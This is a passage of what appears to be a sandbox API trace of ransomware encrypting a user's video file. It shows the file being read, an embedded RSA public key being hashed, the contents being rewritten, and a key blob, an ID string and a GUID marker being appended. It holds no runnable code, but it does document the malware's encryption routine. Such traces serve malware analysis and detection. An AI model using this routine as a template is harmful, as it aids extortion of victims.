hHeap=0x2c0000) returned 1 [0206.508] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\kCmLP4DG7a0U.avi") returned=".avi" [0206.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\kCmLP4DG7a0U.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\kcmlp4dg7a0u.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.508] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=77922) returned 1 [0206.508] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.510] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1303c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.510] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.512] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.512] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x13062, lpOverlapped=0x0) returned 1 [0206.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.513] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321a68) returned 1 [0206.514] CryptCreateHash (in: hProv=0x321a68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.514] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.514] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.514] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.514] GetLastError () returned 0x0 [0206.514] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.514] CryptReleaseContext (hProv=0x321a68, dwFlags=0x0) returned 1 [0206.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.514] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.514] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.514] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13060) returned 0x3b87c98 [0206.515] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b870e8 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c38 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87130 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c50 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c98 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.515] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c80 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79c98 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79c80 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b816a8 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b817c0 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c80 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.517] GetCurrentThreadId () returned 0x600 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67078 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7af98 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321a68 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67180 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.517] GetCurrentThreadId () returned 0x600 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32c64e8 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67288 [0206.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67390 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c98 [0206.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c68 [0206.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cb0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c80 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b816a8 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b818d8 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b819f0 [0206.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c80 | out: hHeap=0x2c0000) returned 1 [0206.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67498 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321a68 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67288 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67498 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819f0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818d8 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c68 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67180 | out: hHeap=0x2c0000) returned 1 [0206.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c50 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87130 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67390 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817c0 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.521] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x1305d, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x1305d, lpOverlapped=0x0) returned 1 [0206.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0206.521] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.521] WriteFile (in: hFile=0x63c, lpBuffer=0x3b67078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b67078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.522] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.522] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.522] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.522] CloseHandle (hObject=0x63c) returned 1 [0206.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.523] RtlAllocateHeap (HeapHandle=0x2c0000, 